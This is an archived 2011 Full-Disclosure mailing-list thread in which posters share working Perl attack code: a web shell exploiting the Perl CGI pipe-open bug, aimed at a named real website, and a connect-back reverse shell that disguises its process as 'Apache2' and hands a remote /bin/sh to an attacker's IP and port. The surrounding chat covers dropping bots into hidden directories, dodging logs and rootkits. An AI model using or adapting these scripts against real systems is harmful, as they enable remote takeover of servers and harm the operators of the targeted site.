| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 16 Oct 2011 14:30:58 +1100
From: xD 0x41 <secn3t@...il.com>
To: Marshall Whittaker <marshallwhittaker@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: perl pipe exploit (drops you at a shell)
Hehe.. fuck the other one.. it does not even give you incoming Ip, it has
one line, and uses bin/sh -i, so prettymuch screws up the whole session from
scratch :)
Also, that has been rumored to have static ip and port setting... altho, it
is not so hard to make changes eh.. this one is basic, and you can even use
a tiny 4 line .c file to actually drop and run the perl file ;p if you wish
to make it more hidden maybe from a REALLY fkn stupid admin i would assume
it would have to be , because, most ppl do check sytem logs :P the few that
dont tho, is already literally, millions of attackable,pwnable, and, very
useable, linux raw sockets :)
Thats as good as sometimes, a baseball across the front of your server...
depending how attackers use theyre systems, and eveytime someone puts up
obvious logs that "i got ownedZ", theyre promoting another ownage, and culd
probably NOT need with detailed blog on exactly what was done etc, wich is
exactly what a good hax0r will do, is just watch hidden for ages and keep
the knowledge, when it is needed though, it is usually someones log wich has
helped with, sometimes even rootkit links...wich is really whats making it a
big ass industry now..also the phpbot, does not discriminate against os...
you find a good vuln or vector for windows, and phpbot will be all over it ,
sometimes even looks like windows have better uptimes, but, that could just
be my own opinion, but, we dont see the uptimes of linux asmuch.. i guess
windows has very short lifespan, i see people rf -rm after week of abusing
theyre sys with a million bad exes, just so they can watch you executing bot
cmds ;p
Its a tricky thing, to rls things to public, or not to.. because, it must be
spoken about but, i wish people did not need to post theyre own ownage, just
coz, it is some 0day bug and they feel *special to be owned first*...
Oh btw here..
#!/usr/bin/perl
use Socket;
$cmd= "Apache2";
$system = 'echo "`uname -a`";';
$system1= 'echo "`id`";';
$system2= 'echo "`pwd`";';
$system3= 'echo "`whoami`@...stname`:~";';
$system4= '/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target);
$paddr=sockaddr_in($port, $iaddr);
$proto=getprotobyname('tcp');
socket(SOCKET,PF_INET,SOCK_STREAM,$proto);
connect(SOCKET,$paddr);
open(STDIN,">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "\n\n--CbacK--\n\n";
print "\nSysInfo: ";
system($system);
print "\nCurrent ID: ";
system($system1);
print "\nCurrent Dir: ";
system($system2);
print "\n";
system($system3);
system($system4);
close(STDIN);
close(STDOUT);
close(STDERR);
....will print exactly what you need information wise, and nothing
more.. execl(),
would be easier todo,I just did not want to show how to, exactly, on
this list... and,
i think this connectback is about as old as my fkn house, so, cpl
hundred yrs or so :P
Just be sure to know it is simple to execute this, perl cb.pl ip-here
port-here, SOoooo
eg: [xd@b0x]:~ # perl cb.pl 172.16.1.12 4444
Will connect me to a local lan box, I removed all non necessary IRC
and other rubbish outputs,
so the shell is optimised for, simple speed, and, yea, modify them
system() cmds ;)
theyre kinda there to keep it abit safer :P
This is been used by kcope and many others as the simple basis for
MOST GOOD shells wich will
do what you want, without you having to always ask...and, i see the Iranian one
sdoes exec bin/sh -i , thus killing job control :s how stupid and
unneccesary, and, one extra logging!
I would not handout howtos on using but is very simple if you know wat
you are doin.
Later, and oh, i added chmod 500 $1 , so a basic chmod for your pipe()
script but atm, it is using the boxes chmod, i will code in
a 'cmod' wich does same, different order/cmd use, and it does not copy
over bin/chmod ofc...wich is why i
think best to always just addin own chmod, but, i guess everything
wich handles files on unix, should handle chmod aso you can use them
:P hehe.. so i just added a basic auto-chmod for the program binary
forst then anybinary used with just "chmod" cmd in the shell... very
simple and sooo handy!
Thats about all it really needed, now, ill connect them up, and,
exchange a few things for much nicer
dev/null logging, etc etc etc :>
Who said FD is dead... we were just 8resting* our usually quite high
IQ minds, wich factually take more
time than the average NON high-IQ homosapien ... kekeke... yes, call
me mad but, who cares... i dont hide it,
crazycoders.com was not just a *name* sheesh..
Cheers , and, i guess used in combination, could be a very handy
connectback, wich does not show logging because the method
is just not visible.. although must use that little bash trick '>&'
the best *feature* in bash :)
Still makes connectback, so darn easy!
I think u have given alot for ppl who cannot operate wget etc , well
you know what i mean ;)
Many ppl would like this, and appreciate it.. i do!
cheers Marshall , you would be asked alot of you like Eminem i bet...
or not... anyhw, Do you like EMINEM??
take care! hehe, always keep your spirits high and life even
higher,Live it like its the lstday,every day!
peace and great job!
xd
// admin @ Crazycoders.com // ( nick xd-- )#Haxnet @ Efnet for simple
communication // NON racist/Polly
On 16 October 2011 12:38, Marshall Whittaker <marshallwhittaker@...il.com>wrote:
> Yeah, I intentionally wrote it to avoid a connect back or bindshell because
> a lot of firewalls block those (I've been tooling around with firewall
> evasion techniques lately...). I have some code laying around somewhere that
> does some kind of connect back from perl I think. I'd have to find it
> though. If you want it let me know. I think some Iranians wrote it lol.
> Anyway, thanks for the comments on the code. :)
>
> On Sat, Oct 15, 2011 at 9:44 PM, xD 0x41 <secn3t@...il.com> wrote:
>
>> Thanks for the POST!
>> hats VERY cool, althugh it was done before, and i did not match codes to
>> see any differences/changes/updates, because I am aware that many systems
>> are being fixed against this bug as I know, or rather, perl stdinout is
>> maybe being patched in some versions, although it does seem to work stable
>> on Debian lenny and thats ok, that would mean most likely Ubuntu is also
>> vulnerable... Personally, i have code wich is about half the size of bth the
>> ones i have seen, but they do a download to box, so, it is a personal
>> wget.pl wich gets , makes dir if none exists, cds to dir, and the cmd is
>> simply like this
>> ./file.pl pipeget www.blah.com/mybot.txt /var/.inaddr/arpa.ps
>> This would then save file, and chmod it automatically as chmod filename +x
>> , wich is just a command i thought was critical when this type of stuff is
>> used... So, I might try and personalise this, and see if it works better, I
>> know the first method i was using to get, was nothing like the one i have
>> now wich is pipe() also but, it just totally makes the need for using wget
>> not needed, and then also the file and whole session of ./file.pl, gets
>> saved to bash_history as a . on its own line, wich is including if you
>> upload/get files from one box and up to the local one your sitting on.
>>
>> Your version, looks the most adaptive one, and would be great to have
>> enabled on any connectback shell, maybe chmod cmd could be automatic when it
>> puts a file upload/download, however you access it, I know main way a user
>> on a control net, would simply privmsg it, and use that pipe exploiting to
>> upload everything, chmod, and hide eveything, wich is probably the BEST
>> addon i could thinkof for any rootkit, and even just upload command, if you
>> target index.php, and look for pg=/page=, maybe a simple my
>> @array("'?page=', '?pagina=', '?pg=', '?Page=', '?url=', "); for it to
>> target things, and make it show simple CMDS> output on connect-back, then
>> print a quick sysinfo and, makesure to show things right on the connectback,
>> then have this, and direct a while($perl_pipe_uploader2) {} ,maybe adding in
>> if/else using the first perlpipeupload.pl as the first method.. this
>> could be great!
>> i will look for my code wich is more like a wget but, it uses the exact
>> same bugs to , actually works better than the standard get/wget or fetch, as
>> it is no switches needed, just the corect args, and it does the rest in
>> execl() mode, thru this, i have i think in old days probably used this bug
>> somuch, it became a feautre for awhile :P
>> I think the scripting is great, the code is good, clear and concise,. and
>> very easy to simply use as an addon case 'perlpipeupload2': or, however you
>> may add it.. it is awesome code. I ight have to snippet this posting and,
>> show both, or, al 3 on my website (crazycoders.com) ,and if you have a
>> Posting already up wich will stay there, id be happy to point to it, and
>> also paste it, so, thanks!
>> i will try and find the code for the wget/put/uploader, when your in PM
>> with a bot and you do !cmd mywget a.at/bot /b/o/t , only switches is
>> -s|-n for silent or notice user exact infos, prettymuch a wget-summary.
>> I like the code and appreciate your posting. It is a nice bug and even
>> nicer method to exploit it.
>> regards,
>> xd-- // #haxnet@...et // Independant Arsehole
>>
>>
>> PS: shizzle my nizzle matey! shizzle it good!
>>
>>
>>
>>
>> On 16 October 2011 09:01, Marshall Whittaker <marshallwhittaker@...il.com
>> > wrote:
>>
>>> Well shit. It did send twice. :( Now I look like a goof, haha.
>>>
>>> On Sat, Oct 15, 2011 at 6:58 PM, Marshall Whittaker <
>>> marshallwhittaker@...il.com> wrote:
>>>
>>>> This works off the perl pipe read bug, you can just input the first and
>>>> second parts of the web address (with http:// included) and it'll drop
>>>> you at a shell. When using cd you must use the absolute path because I was
>>>> too lazy to do it the correct way. ;-). I know this is pretty easy stuff,
>>>> it works off those vulns that can just be exploited with a web browser, but
>>>> this gives you a shell. So have at it guys & gals! Had to resend because I
>>>> got some message about my attachment being blocked. Not sure if it really
>>>> was, though, I'll send again anyway. Hope this isn't spamming the list. =/
>>>>
>>>> Site:
>>>> http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=stats/1966vinmatrix.htm&desc=Stat+File
>>>> Useage: ./sublime.pl "
>>>> http://ultimategto.com/cgi-bin/statsedittext.cgi?filename="
>>>> "&desc=Stat+File"
>>>>
>>>> Should work on most perl cgi scripts that are vulnerable to | read bug.
>>>> Please note, it's not a "real" shell, but almost everything works, except
>>>> things that won't go in one instance like cd-ing and env vars, etc.
>>>>
>>>> Play nice!
>>>>
>>>> --oxagast
>>>>
>>>> [CODE]
>>>>
>>>> #!/usr/bin/perl
>>>>
>>>> # adaptive cgi shell by oxagast
>>>>
>>>> use LWP::Simple;
>>>> $part1 = @ARGV[0]; $part2 = @ARGV[1];
>>>> print "Making buffer...\n";
>>>> for $bet (100..200) {
>>>> $bettwo = $bettwo . "AAAA" . $bet . "AAAA\\\\n";
>>>> }
>>>> print "Exploiting...\n";
>>>> $id = get("$part1\|id\|$part2");
>>>> $id =~ m/(uid=\d+\(.*\) gid=\d+\(.*\) groups=\d+\(.*\))/;
>>>> print "Well shizzle my nizzle... shell by oxagast... use wisely
>>>> \;\)\n\n";
>>>> $uid = $1;
>>>> print "$uid\n";
>>>> while (0 == 0) {
>>>> print "\$ ";
>>>> $cmd = <STDIN>;
>>>> chomp($cmd);
>>>> if ($cmd =~ m/cd (\/.*)/) {
>>>> $dir = $1;
>>>> }
>>>> if ($cmd eq "cd ..") {
>>>> $dir =~ s/(.*)\/.*/\/\1/;
>>>> }
>>>> if ($cmd eq "pwd") {
>>>> $dirjunk = $dir;
>>>> if ($dirjunk eq "//") {
>>>> $dirjunk = "/";
>>>> }
>>>> }
>>>> $dirjunk = "cd $dir\;$cmd";
>>>> $cmdhex = unpack("H*","$dirjunk &>/tmp/cmdlnerr");
>>>> $cmdhex =~ s/(..)/\\\\x$1/g;
>>>> get("$part1\|echo -e $bettwo > /tmp/buff\|$part2");
>>>> $backjunk2 = get("$part1\|cat /tmp/buff\|$part2");
>>>> @backjunk = split("\n", $backjunk2);
>>>> get("$part1\|echo -e \"$cmdhex\" > /tmp/cmdln\|$part2");
>>>> get("$part1\|/bin/sh /tmp/cmdln > /tmp/cmdlerr\|$part2");
>>>> $backjunk_as = get("$part1\|cat /tmp/cmdlnerr\|$part2");
>>>> @backjunk_split = split("\n", $backjunk_as);
>>>> $backjunk_wcl = get("$part1\|wc -l /tmp/cmdlnerr\|$part2");
>>>> $backjunk_wcl =~ m/(\d+) \/tmp\/cmdlnerr/m;
>>>> $thismanylines = $1 - 1;
>>>> for $junknum (0..scalar(@backjunk_split)) {
>>>> for $fuzz (10..100+$thismanylines) {
>>>> if ($backjunk[$junknum] =~ m/(AAAA\Q$fuzz\EAAAA)/) {
>>>> $middle = $1;
>>>> @backjunk[$junknum] =~ m/(.*)\Q$middle\E/;
>>>> @backjunk_split[$junknum] =~ s/$1//;
>>>> @backjunk[$junknum] =~ m/\Q$middle\E(.*)/;
>>>> @backjunk_split[$junknum] =~ s/$1//;
>>>> print "$backjunk_split[$junknum]\n";
>>>> }
>>>> }
>>>> }
>>>> }
>>>>
>>>> [/CODE]
>>>>
>>>
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists